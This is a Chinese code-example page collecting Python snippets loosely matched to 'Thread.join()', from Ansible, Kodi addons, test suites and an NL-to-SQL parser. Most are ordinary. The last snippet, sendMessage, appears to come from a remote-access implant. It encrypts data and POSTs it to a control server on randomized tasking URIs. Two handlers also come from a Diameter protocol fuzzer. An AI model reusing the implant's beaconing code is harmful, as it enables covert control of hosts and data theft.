Python threading.Thread 模块,join() 实例源码
我们从Python开源项目中,提取了以下44个代码示例,用于说明如何使用threading.Thread.join()。
def get_pid_location(module):
"""
Try to find a pid directory in the common locations, falling
back to the user's home directory if no others exist
"""
for dir in ['/var/run', '/var/lib/run', '/run', os.path.expanduser("~/")]:
try:
if os.path.isdir(dir) and os.access(dir, os.R_OK|os.W_OK):
return os.path.join(dir, '.accelerate.pid')
except:
pass
module.fail_json(msg="couldn't find any valid directory to use for the accelerate pid file")
# NOTE: this shares a fair amount of code in common with async_wrapper, if async_wrapper were a new module we could move
# this into utils.module_common and probably should anyway
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
#check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
#Error out if we can find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def testMTRandomness(self):
q = queue.Queue()
def proc():
rng = tar.gen_rng()
with tar.with_rng(rng):
time.sleep(0.5)
state = tar.get_rng().get_state()
time.sleep(0.5)
q.put(state)
threads = [Thread(target=proc) for i in range(2)]
map_exec(Thread.start, threads)
map_exec(Thread.join, threads)
v1, v2 = q.get(), q.get()
self.assertFalse(np.allclose(v1[1], v2[1]))
def join(self):
Thread.join(self)
return self.select_objects
def is_join(self, historic, table_src, table_trg):
historic = historic
links = self.get_all_direct_linked_tables_of_a_table(table_src)
differences = []
for join in links:
if join[0][0] not in historic:
differences.append(join)
links = differences
for join in links:
if join[1][0] == table_trg:
return [0, join]
path = []
historic.append(table_src)
for join in links:
result = [1, self.is_join(historic, join[1][0], table_trg)]
if result[1] != []:
if result[0] == 0:
path.append(result[1])
path.append(join)
else:
path = result[1]
path.append(join)
return path
def join(self):
Thread.join(self)
return self.where_objects
def join(self):
Thread.join(self)
return self.order_by_objects
def remove_accents(self, string):
nkfd_form = unicodedata.normalize('NFKD', str(string))
return "".join([c for c in nkfd_form if not unicodedata.combining(c)])
def join(self, timeout=None):
try:
self.queue.task_done()
except ValueError as e:
pass # Nothing waiting in queue, how nice!
self.queue.put(None)
Thread.join(self, timeout)
def qout_join(self):
for q in self.queue_out:
q.join()
def join(self, timeout=0):
"""??????"""
self._event.set()
Thread.join(self, timeout)
def stop(timeout=None):
"""???????????????"""
for thread in FThread._fthreads:
thread.join(timeout)
def join(self,timeout=None):
Thread.join(self, timeout=timeout)
return self._return
def join(self, timeout):
""" Join method
:param timeout: thread timeout
:return: thread method return value
"""
Thread.join(self, timeout)
return self.return_value
def join(self, timeout=None):
"""Stops the thread"""
self._stopevent.set()
Thread.join(self, timeout)
def join(self, timeout=None):
"""Stops the thread"""
self._stopevent.set()
Thread.join(self, timeout)
#--------------------------------------------------------------------#
def join(self):
Thread.join(self)
return self.exc_info
def get_JSON_response(url="", cache_days=7.0, headers=False):
now = time.time()
hashed_url = hashlib.md5(url).hexdigest()
cache_path = xbmc.translatePath(os.path.join(ADDON_DATA_PATH, 'cache'))
path = os.path.join(cache_path, hashed_url + ".txt")
cache_seconds = int(cache_days * 86400.0)
prop_time = HOME.getProperty(hashed_url + "_timestamp")
if prop_time and now - float(prop_time) < cache_seconds:
try:
prop = json.loads(HOME.getProperty(hashed_url))
logger.info("streamondemand.channels.database prop load for %s. time: %f" % (url, time.time() - now))
return prop
except:
logger.info("could not load prop data for %s" % url)
if xbmcvfs.exists(path) and ((now - os.path.getmtime(path)) < cache_seconds):
results = read_from_file(path)
logger.info("streamondemand.channels.database loaded file for %s. time: %f" % (url, time.time() - now))
else:
response = get_http(url, headers)
try:
results = json.loads(response)
logger.info("streamondemand.channels.database download %s. time: %f" % (url, time.time() - now))
save_to_file(results, hashed_url, cache_path)
except:
logger.info("streamondemand.channels.database Exception: Could not get new JSON data from %s. Tryin to fallback to cache" % url)
if xbmcvfs.exists(path):
results = read_from_file(path)
else:
results = []
HOME.setProperty(hashed_url + "_timestamp", str(now))
HOME.setProperty(hashed_url, json.dumps(results))
return results
def save_to_file(content, filename, path=""):
if path == "":
return False
if not xbmcvfs.exists(path):
xbmcvfs.mkdirs(path)
text_file_path = os.path.join(path, filename + ".txt")
now = time.time()
text_file = xbmcvfs.File(text_file_path, "w")
json.dump(content, text_file)
text_file.close()
logger.info("saved textfile %s. Time: %f" % (text_file_path, time.time() - now))
return True
def logInfo(*args):
logging.getLogger(LOG_LOGGER).info(" - ".join(args))
###################################################################################
def logWarning(*args):
logging.getLogger(LOG_LOGGER).warning(" - ".join(args))
###################################################################################
def logDebug(*args):
if CONFIG["debug"]:
logging.getLogger(LOG_LOGGER).debug(" - ".join(args))
###################################################################################
def join(self, timeout=None):
Thread.join(self, timeout)
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
raise IOError('Path %r does not start with module name %r', (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n'+padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
def testFakeMTRandomness(self):
mutex = threading.Lock()
@contextlib.contextmanager
def fake_with_rng(rrr):
from tartist.random import rng
with mutex:
backup = rng._rng
rng._rng = rrr
yield rrr
with mutex:
rng._rng = backup
q = queue.Queue()
def proc():
rng = tar.gen_rng()
with fake_with_rng(rng):
time.sleep(0.5)
state = tar.get_rng().get_state()
time.sleep(0.5)
q.put(state)
threads = [Thread(target=proc) for i in range(2)]
map_exec(Thread.start, threads)
map_exec(Thread.join, threads)
v1, v2 = q.get(), q.get()
self.assertFalse(not np.allclose(v1[1], v2[1]))
def dwr_handler(fuzzed, f):
(own_plug, fuzzed_plug) = sk.socketpair(sk.AF_UNIX, sk.SOCK_SEQPACKET)
child = WrappedThread(fuzzed_plug, target=fuzzed, args=[fuzzed_plug])
child.start()
while True:
(readable, _, _) = sl.select([own_plug, f], [], [])
if own_plug in readable:
try:
b = own_plug.recv(dm.U24_MAX)
if len(b) == 0:
break
except:
break
f.send(b)
elif f in readable:
b = f.recv(dm.U24_MAX)
if len(b) == 0:
break
m = dm.Msg.decode(b)
if m.code == 280 and m.R:
dwa = dm.Msg(code=280, R=False, e2e_id=m.e2e_id, h2h_id=m.h2h_id, avps=[
dm.Avp(code=264, M=True, data=local_host),
dm.Avp(code=296, M=True, data=local_realm),
dm.Avp(code=268, M=True, u32=2001),
dm.Avp(code=278, M=True, u32=0xcafebabe)])
f.send(dwa.encode())
else:
own_plug.send(b)
own_plug.close()
return child.join()
def get_path(a, codes):
attrs = {}
attrs['code'] = a.code
if a.vendor != 0:
attrs['vendor'] = a.vendor
path = ','.join(['%s=%d' % (x, attrs[x]) for x in attrs])
key = (a.code, a.vendor)
if len(codes[key]) != 1:
path += '[%d]' % (codes[key].index(a))
return path
def dwr_handler(scenario, f):
msgs = []
(own_plug, fuzzed_plug) = sk.socketpair(sk.AF_UNIX, sk.SOCK_SEQPACKET)
child = Thread(target=scenario, args=[fuzzed_plug])
child.start()
while True:
(readable, _, _) = sl.select([own_plug, f], [], [])
if own_plug in readable:
b = own_plug.recv(dm.U24_MAX)
if len(b) == 0:
break
m = dm.Msg.decode(b)
msgs.append((m, True))
f.send(b)
elif f in readable:
b = f.recv(dm.U24_MAX)
if len(b) == 0:
break
m = dm.Msg.decode(b)
if m.code == 280 and m.R:
dwa = dm.Msg(code=280, R=False, e2e_id=m.e2e_id, h2h_id=m.h2h_id, avps=[
dm.Avp(code=264, M=True, data=local_host),
dm.Avp(code=296, M=True, data=local_realm),
dm.Avp(code=268, M=True, u32=2001),
dm.Avp(code=278, M=True, u32=0xcafebabe)])
f.send(dwa.encode())
else:
msgs.append((m, False))
own_plug.send(b)
own_plug.close()
exc_info = child.join()
return (exc_info, msgs)
def run(self):
for table_of_from in self.tables_of_from: # for each query
self.select_object = Select()
is_count = False
self.columns_of_select = self.uniquify(self.columns_of_select)
number_of_select_column = len(self.columns_of_select)
if number_of_select_column == 0:
select_type = []
for count_keyword in self.count_keywords:
# if count_keyword in (word.lower() for word in self.phrase):
# so that it matches multiple words too in keyword synonymn in .lang rather than just single word for COUNT
# (e.g. QUERY-> "how many city there are in which the employe name is aman ?" )
lower_self_phrase = ' '.join(word.lower() for word in self.phrase)
if count_keyword in lower_self_phrase:
select_type.append('COUNT')
self.select_object.add_column(None, self.uniquify(select_type))
else:
select_phrases = []
previous_index = 0
for i in range(0, len(self.phrase)):
for column_name in self.columns_of_select:
if (self.phrase[i] == column_name) or (
self.phrase[i] in self.database_object.get_column_with_this_name(column_name).equivalences):
select_phrases.append(self.phrase[previous_index:i + 1])
previous_index = i + 1
select_phrases.append(self.phrase[previous_index:])
for i in range(0, len(select_phrases)): # for each select phrase (i.e. column processing)
select_type = []
phrase = [word.lower() for word in select_phrases[i]]
for keyword in self.average_keywords:
if keyword in phrase:
select_type.append('AVG')
for keyword in self.count_keywords:
if keyword in phrase:
select_type.append('COUNT')
for keyword in self.max_keywords:
if keyword in phrase:
select_type.append('MAX')
for keyword in self.min_keywords:
if keyword in phrase:
select_type.append('MIN')
for keyword in self.sum_keywords:
if keyword in phrase:
select_type.append('SUM')
for keyword in self.distinct_keywords:
if keyword in phrase:
select_type.append('DISTINCT')
if (i != len(select_phrases) - 1):
column = self.get_column_name_with_alias_table(self.columns_of_select[i], table_of_from)
self.select_object.add_column(column, self.uniquify(select_type))
self.select_objects.append(self.select_object)
def build_movie_list(item, movies):
if movies is None: return []
itemlist = []
for movie in movies:
title = normalize_unicode(tmdb_tag(movie, 'title'))
title_search = normalize_unicode(tmdb_tag(movie, 'title'), encoding='ascii')
poster = tmdb_image(movie, 'poster_path')
fanart = tmdb_image(movie, 'backdrop_path', 'w1280')
jobrole = normalize_unicode(' [COLOR azure][' + tmdb_tag(movie, 'job') + '][/COLOR]' if tmdb_tag_exists(movie, 'job') else '')
genres = ' / '.join([tmdb_genre(genre).upper() for genre in tmdb_tag(movie, 'genre_ids', [])])
year = tmdb_tag(movie, 'release_date')[0:4] if tmdb_tag_exists(movie, 'release_date') else ''
plot = "[COLOR orange]%s%s[/COLOR]\n%s"%(genres, '\n' + year, tmdb_tag(movie, 'overview'))
plot = normalize_unicode(plot)
found = False
kodi_db_movies = kodi_database_movies(title)
for kodi_db_movie in kodi_db_movies:
logger.info('streamondemand.database set for local playing(%s):\n%s' % (title, str(kodi_db_movie)))
if year == str(kodi_db_movie["year"]):
found = True
itemlist.append(Item(
channel=item.channel,
action='play',
url=kodi_db_movie["file"],
title='[COLOR orange][%s][/COLOR] ' % NLS_Library + kodi_db_movie["title"] + jobrole,
thumbnail=kodi_db_movie["art"]["poster"],
category=genres,
plot=plot,
viewmode='movie_with_plot',
fanart=kodi_db_movie["art"]["fanart"],
folder=False,
))
if not found:
logger.info('streamondemand.database set for channels search(%s)' % title)
itemlist.append(Item(
channel=item.channel,
action='do_channels_search',
extra=("%4s" % year) + title_search,
title=title + jobrole,
thumbnail=poster,
category=genres,
plot=plot,
viewmode='movie_with_plot',
fanart=fanart,
))
return itemlist
def sendMessage(packets=None):
"""
Requests a tasking or posts data to a randomized tasking URI.
If packets == None, the agent GETs a tasking from the control server.
If packets != None, the agent encrypts the passed packets and
POSTs the data to the control server.
"""
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = "".join(packets)
data = aes_encrypt_then_hmac(key, data)
taskURI = random.sample(taskURIs, 1)[0]
if (server.endswith(".php")):
# if we have a redirector host already
requestUri = server
else:
requestUri = server + taskURI
try:
data = (urllib2.urlopen(urllib2.Request(requestUri, data, headers))).read()
return ("200", data)
except urllib2.HTTPError as HTTPError:
# if the server is reached, but returns an erro (like 404)
missedCheckins = missedCheckins + 1
return (HTTPError.code, "")
except urllib2.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, "")
return ("","")
################################################
#
# encryption methods
#
################################################